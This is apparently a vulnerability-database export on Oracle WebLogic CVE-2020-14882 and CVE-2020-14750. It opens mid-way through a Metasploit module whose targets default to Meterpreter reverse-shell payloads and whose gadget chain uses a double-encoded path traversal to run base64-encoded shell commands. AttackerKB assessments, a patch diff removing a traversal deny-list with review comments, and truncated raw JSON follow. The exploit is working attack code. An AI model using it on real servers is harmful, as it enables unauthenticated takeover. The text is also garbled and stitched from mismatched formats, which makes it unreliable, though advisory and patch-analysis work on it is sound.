            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :curl,
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
                'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'
              }
            }
          ],
          [
            'PowerShell Stager',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
              }
            }
          ]
        ],
        'DefaultTarget' => 4,
        'DefaultOptions' => {
          'WfsDelay' => 10
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(7001),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_handle(rand_text_alphanumeric(8..42))

    unless res
      return CheckCode::Unknown('Target did not respond to check.')
    end

    if res.code == 200 && res.body.include?('Deploying Application')
      raise RuntimeError
    end

    # HTTP/1.1 302 Moved Temporarily
    # [snip]
    # Location: http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=UnexpectedExceptionPage
    # [snip]
    unless res.code == 302 &&
           res.redirection.path == '/console/console.portal' &&
           res.redirection.query.include?('_pageLabel=UnexpectedExceptionPage')
      return CheckCode::Safe('Path traversal failed.')
    end

    CheckCode::Vulnerable('Path traversal successful.')
  rescue RuntimeError
    vprint_error('Application is deploying, sleeping and retrying check')

    sleep(1)
    retry
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded)
    when :linux_dropper, :win_dropper
      execute_cmdstager
    when :psh_stager
      execute_command(cmd_psh_payload(
        payload.encoded,
        payload.arch.first,
        remove_comspec: true
      ))
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    send_request_handle(coherence_gadget_chain(cmd))
  end

  def send_request_handle(handle)
    send_request_cgi(
      'method' => 'POST',
      'uri' => aperture_science_handheld_portal_device,
      'vars_post' => {
        'handle' => handle
      }
    )
  end

  def coherence_gadget_chain(cmd)
    <<~JAVA.gsub(/^\s+/, '').tr("\n", '')
      com.tangosol.coherence.mvel2.sh.ShellSession('
        java.lang.Runtime.getRuntime().exec(
          new java.lang.String[] {
            #{win_target? ? '"cmd.exe", "/c", ' : '"/bin/sh", "-c", '}
            new java.lang.String(
              java.util.Base64.getDecoder().decode("#{Rex::Text.encode_base64(cmd)}")
            )
          }
        )
      ')
    JAVA
  end

  def aperture_science_handheld_portal_device
    normalize_uri(target_uri.path, '/console/css/.%252e/console.portal')
  end

  def win_target?
    target.platform.names.first == 'Windows'
  end

end
```

### CVE-2017-11610 (AttackerKB)

Source: AttackerKB, ID AKB:4AD409C9-5AD4-4111-9454-32638C9F8255, <https://attackerkb.com/topics/rRCj4KklOQ/cve-2017-11610>. Published 2017-08-23, last modified 2020-07-30 (last seen 2023-09-28). CVE-2017-11610. CVSS v3.0 8.8 High (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H; exploitability 2.8, impact 5.9); CVSS v2 9.0 High (AV:N/AC:L/Au:S/C:C/I:C/A:C; exploitability 8.0, impact 10.0).

The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.

**Recent assessments:**

Assessed Attacker Value: 0 / 0 / 0

### CVE-2020-2555 (AttackerKB)

Source: AttackerKB, ID AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F, <https://attackerkb.com/topics/gB0KtHnrZE/cve-2020-2555>. Published 2020-01-15, last modified 2021-01-20 (edition 2; last seen 2021-07-21). CVEs: CVE-2020-14750, CVE-2020-14882, CVE-2020-2555. CVSS v3.1 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability 3.9, impact 5.9); CVSS v2 10.0 High (AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability 10.0, impact 10.0).

Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

**Recent assessments:**

**ccondon-r7** at January 29, 2021 5:47pm UTC reported:

Since this got a little more attention later in 2020, it's probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we've seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.

Further assessments by **space-r7** (May 15, 2020 7:02pm UTC) and **gwillcox-r7** (October 20, 2020 6:53pm UTC).

Assessed Attacker Value: 4 / 4 / 3

### CVE-2020-14750 — Oracle WebLogic Remote Unauthenticated Remote Code Execution (RCE) Vulnerability

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Source: AttackerKB, ID AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D, <https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability>. Published 2020-11-02, last modified 2020-11-19 (last seen 2023-08-31). CVEs: CVE-2020-14750, CVE-2020-14882, CVE-2021-26084. CVSS v3.1 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability 3.9, impact 5.9); CVSS v2 10.0 High (AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability 10.0, impact 10.0).

**Recent assessments:**

**wvu-r7** at November 02, 2020 10:26pm UTC reported:

CVE-2020-14750 appears to be the patch bypass for [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server>). Please see CVE-2020-14882's [Rapid7 analysis](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server#rapid7-analysis>) for more information. The CVE-2020-14750 patch is reproduced below.

```diff
--- patched1/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java	2020-11-02 13:13:28.000000000 -0600
+++ patched2/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java	2020-11-02 12:11:01.000000000 -0600
@@ -2,6 +2,7 @@
 
 import com.bea.netuix.servlets.manager.SingleFileServlet;
 import java.io.IOException;
+import java.util.List;
 import javax.servlet.ServletConfig;
 import javax.servlet.ServletException;
 import javax.servlet.ServletRequest;
@@ -20,8 +21,6 @@
 
 private static final long serialVersionUID = 1L;
 
- private static final String[] IllegalUrl = new String[] { ";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">" };
- 
 public static void initMBean() {
 MBeanUtilsInitializer.initMBeanAsynchronously();
 }
@@ -39,8 +38,9 @@
 if (req instanceof HttpServletRequest) {
 HttpServletRequest httpServletRequest = (HttpServletRequest)req;
 String url = httpServletRequest.getRequestURI();
- for (int i = 0; i < IllegalUrl.length; i++) {
- if (url.contains(IllegalUrl[i])) {
+ if (!ConsoleUtils.isUserAuthenticated(httpServletRequest))
+ throw new ServletException("User not authenticated."); 
+ if (!isValidUrl(url, httpServletRequest)) {
 if (resp instanceof HttpServletResponse) {
 LOG.error("Invalid request URL detected. ");
 HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
@@ -49,7 +49,6 @@
 return;
 } 
 } 
- } 
 try {
 super.service(req, resp);
 } catch (IllegalStateException e) {
@@ -60,4 +59,15 @@
 LOG.debug(e); 
 } 
 }
+ 
+ private boolean isValidUr(String url, HttpServletRequest req) {
+ String consoleContextPath = ConsoleUtils.getConsoleContextPath();
+ List<String> portalList = ConsoleUtils.getConsolePortalList();
+ for (String portal : portalList) {
+ String tmp = "/" + consoleContextPath + portal;
+ if (url.equals(tmp))
+ return true; 
+ } 
+ return false;
+ }
 }
```

Assessed Attacker Value: 5 / 5 / 5
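Review bot: dropping IllegalUrl in the @@ -20,8 +21,6 hunk is the right call, but the commit should record why: the list was matched with case-sensitive String.contains() on the raw, undecoded request URI, so a lowercase `%2e%2e` and the mixed `.%252e` form the Metasploit module sends (which contains neither `..` nor `%252E%252E`) both pass. A deny-list over an un-normalised string cannot enumerate every encoding of a dot segment, which is what the exact-match replacement later in this patch addresses.

Review bot: in the @@ -39,8 +38,9 hunk, `throw new ServletException("User not authenticated.")` turns every unauthenticated request to this servlet into a container error page rather than the console's usual login redirect; confirm that is intended, since any client that used to fetch console resources through this path without a session now gets a server error. Ordering the authentication check before isValidUrl() is the stronger of the two fixes, because it closes the unauthenticated route regardless of how the URL is spelled, but note the side effect: `LOG.error("Invalid request URL detected. ")` no longer fires for unauthenticated probes, so any detection rule keyed on that log line must be updated.

Review bot: isValidUrl() in the @@ -60,4 +59,15 hunk declares `HttpServletRequest req` and never uses it; drop the parameter or use it. The `url.equals("/" + consoleContextPath + portal)` comparison against getRequestURI(), which the container does not decode, is what makes this check robust: any percent-encoded or dot-segment variant fails equality, so no decoding or normalisation step is needed. Two consequences deserve a comment: a URI carrying a path parameter (`;jsessionid=...`) or a trailing slash no longer matches, and every portal path that must stay reachable has to be present in getConsolePortalList(), since a missing entry now fails closed rather than open.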
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-09T17:26:10", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**elligottmc** at October 29, 2020 2:27pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**ccondon-r7** at November 01, 2020 4:19pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**lvarela-r7** at October 29, 2020 12:41pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14882 \u2014 Unauthenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555", "CVE-2021-26084"], "modified": "2020-12-28T00:00:00", "id": "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "href": "https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-13T18:12:19", "description": "# (CVE-2020\u201314882) Weblogic Unauthorized bypass RCE\n(CVE-2020-14...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2020-11-01T13:12:27", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-02-12T00:29:42", "id": "65160BD3-C57E-53F7-BB62-1409E74EB491", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:04", "description": "# CVE-2020-14882\n\n## \u53d7\u5f71\u54cd\u7684\u7248\u672c\uff1a 10.3.6.0.0\u300112.1.3.0.0\u300112.2.1.3.0\u300112...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T15:44:23", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-07-02T01:19:54", "id": "DAF7B187-3A0C-543D-BE33-E65468E5890A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:35:22", "description": "<h1 style=\"font-size:10vw\" align=\"center\"><b>CVE-2020-14882 WebL...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T21:32:36", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-09-16T07:25:25", "id": "E8075733-690E-5B6E-984C-80D074BC5EFF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-15T11:54:14", "description": "# CVE-2020-14882\nCVE-2020-14882\n\n## Description \nVulnerability ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T12:57:08", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-07-15T09:44:00", "id": "859F1E96-558A-5D4B-8759-8AA74395E276", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:32", "description": "# CVE-2020-1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T06:30:30", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-03-18T23:00:39", "id": "45775466-2D18-5308-ACCE-40CA731C65D0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-08T02:04:26", "description": "# CVE-2020-14882_ALL\r\n\r\nCVE-2020-14882_ALL\u7efc\u5408\u5229\u7528\u5de5\u5177\uff0c\u652f\u6301\u547d\u4ee4\u56de\u663e\u68c0\u6d4b\u3001\u6279\u91cf\u547d\u4ee4\u56de\u663e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-03T10:49:35", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-08-07T12:56:08", "id": "9AEDE16C-FF28-5178-A8D1-CB6649E9ED56", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:13:29", "description": "# 
CVE-2020-14882-GUI\n\n\u521a\u63a5\u89e6\u4e86qt\u6846\u67b6\uff0c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-11T06:52:32", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-05-13T22:02:55", "id": "AE4BD3D3-726F-5F95-8DB4-6630F922B00F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:15:33", "description": "(patched as of around 10/30/20)\n# McMaster-University-Blind-Comm...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T01:28:41", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-12-04T02:16:03", "id": "8A77E3B6-D786-5618-ACC4-555A5D85D5D5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:17:13", "description": "# CVE-2020-14882\u6279\u91cf\u9a8c\u8bc1 #\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-31T01:43:54", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-12-28T09:13:41", "id": "900648E6-9E3A-5883-8D16-DC10AD3DCF6F", 
"href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:43:36", "description": "# CVE-2020-14882\nCVE-2020-14882/14883/14750\n\n# USE\n1. clone...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T03:09:13", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": 